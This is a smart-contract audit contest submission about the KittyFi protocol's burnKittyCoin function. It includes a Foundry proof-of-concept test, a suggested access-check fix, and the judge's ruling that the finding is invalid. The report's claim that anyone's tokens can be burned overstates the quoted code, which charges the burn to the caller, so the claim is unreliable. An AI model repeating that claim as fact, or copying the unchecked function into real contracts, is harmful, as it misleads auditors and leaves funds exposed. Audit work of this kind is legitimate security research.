First Flight #21: KittyFi

Beginner Friendly · DeFi · Foundry
Submission Details
Severity: high
Invalid

Burning anyone's tokens

Summary

The protocol allows a user to burn any other user's tokens.

Vulnerability Details

There is no check that msg.sender is allowed to burn on behalf of the _onBehalfOf address.

https://github.com/Cyfrin/2024-08-kitty-fi/blob/950ac553b935a3bf9277b71ffa5662a84f2633fe/src/KittyPool.sol#L112-L115

    // Reduces the recorded debt of _onBehalfOf without verifying that msg.sender
    // may act for that address; the token burn itself is charged to msg.sender.
    function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
        kittyCoinMeownted[_onBehalfOf] -= _ameownt;
        i_kittyCoin.burn(msg.sender, _ameownt);
    }

Impact

Because there is no check that msg.sender is allowed to burn the tokens of the _onBehalfOf address, a caller can burn anyone's tokens, with repercussions.

    address user2 = makeAddr("user2");

    function setUp() external {
        HelperConfig helperConfig = new HelperConfig();
        config = helperConfig.getNetworkConfig();
        weth = config.weth;
        deal(weth, user, AMOUNT);
        deal(weth, user2, AMOUNT);
        ...

    function test_UserCanBurnAnyonesToken() public {
        uint256 toDeposit = 5 ether;
        uint256 amountToMint = 8e18;
        uint256 toBurn = 5e18;

        // user deposits WETH collateral and mints 8e18 KittyCoin
        vm.startPrank(user);
        IERC20(weth).approve(address(wethVault), toDeposit);
        kittyPool.depawsitMeowllateral(weth, toDeposit);
        kittyPool.meowintKittyCoin(amountToMint);
        vm.stopPrank();

        // a different account calls burnKittyCoin with user as _onBehalfOf
        vm.prank(user2);
        kittyPool.burnKittyCoin(user, toBurn);

        // user's recorded minted amount drops from 8e18 to 3e18
        assertEq(kittyPool.getKittyCoinMeownted(user), 3e18);
    }

Tools Used

Foundry

Recommendations

There should be a check that the _onBehalfOf address has allowed msg.sender to burn on its behalf.
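As an added illustration of that recommendation (example code written for this page, not the KittyFi code base), the contract below places the quoted `burnKittyCoin` next to a hardened version that only lets `_onBehalfOf` itself, or an operator it has explicitly approved, reduce its recorded debt. `MockKittyCoin`, `KittyPoolBurnExample`, the `burnOperators` mapping, `setBurnOperator` and the custom error are all assumptions for the example; the project's real token interface, minting logic and storage layout are not reproduced.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal stand-in for the KittyCoin token (an assumption for this example,
// not the project's token). Only the mint/burn paths matter here.
contract MockKittyCoin {
    mapping(address => uint256) public balanceOf;
    address public pool;

    function setPool(address _pool) external {
        pool = _pool;
    }

    function mint(address to, uint256 amount) external {
        require(msg.sender == pool, "only pool");
        balanceOf[to] += amount;
    }

    // Burns from `from`; reverts on insufficient balance like a standard ERC20.
    function burn(address from, uint256 amount) external {
        require(msg.sender == pool, "only pool");
        balanceOf[from] -= amount;
    }
}

contract KittyPoolBurnExample {
    MockKittyCoin public immutable i_kittyCoin;

    // Per-user KittyCoin debt, same bookkeeping name as in the report.
    mapping(address => uint256) public kittyCoinMeownted;

    // Added for this example: owner => operator => may call burnKittyCoin on owner's behalf.
    mapping(address => mapping(address => bool)) public burnOperators;

    error KittyPool__NotAllowedToBurnOnBehalf(address owner, address caller);

    constructor(MockKittyCoin kittyCoin) {
        i_kittyCoin = kittyCoin;
    }

    // Simplified mint: records the caller's debt and mints the coin to the caller.
    function meowintKittyCoin(uint256 _ameownt) external {
        kittyCoinMeownted[msg.sender] += _ameownt;
        i_kittyCoin.mint(msg.sender, _ameownt);
    }

    // Hypothetical opt-in: the caller grants or revokes an operator for its own debt.
    function setBurnOperator(address operator, bool allowed) external {
        burnOperators[msg.sender][operator] = allowed;
    }

    // As quoted in the report: nothing ties msg.sender to _onBehalfOf.
    function burnKittyCoinUnchecked(address _onBehalfOf, uint256 _ameownt) external {
        kittyCoinMeownted[_onBehalfOf] -= _ameownt;
        i_kittyCoin.burn(msg.sender, _ameownt);
    }

    // Hardened per the recommendation: only _onBehalfOf itself, or an operator
    // it has approved via setBurnOperator, may reduce its recorded debt.
    function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
        if (msg.sender != _onBehalfOf && !burnOperators[_onBehalfOf][msg.sender]) {
            revert KittyPool__NotAllowedToBurnOnBehalf(_onBehalfOf, msg.sender);
        }
        kittyCoinMeownted[_onBehalfOf] -= _ameownt;
        i_kittyCoin.burn(msg.sender, _ameownt);
    }
}
```

In a Foundry test the check is exercised by pranking as a second account and wrapping the call in `vm.expectRevert(abi.encodeWithSelector(KittyPoolBurnExample.KittyPool__NotAllowedToBurnOnBehalf.selector, user, user2))` before `pool.burnKittyCoin(user, toBurn)`, then repeating the call after `user` has run `setBurnOperator(user2, true)` and asserting that `kittyCoinMeownted(user)` decreased. The operator mapping is deliberately boolean rather than an amount-based allowance to keep the example small; an ERC20-style allowance would work equally well.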

Updates

Lead Judging Commences

shikhar229169 (Lead Judge), 10 months ago
Submission Judgement Published
Invalidated
Reason: Other
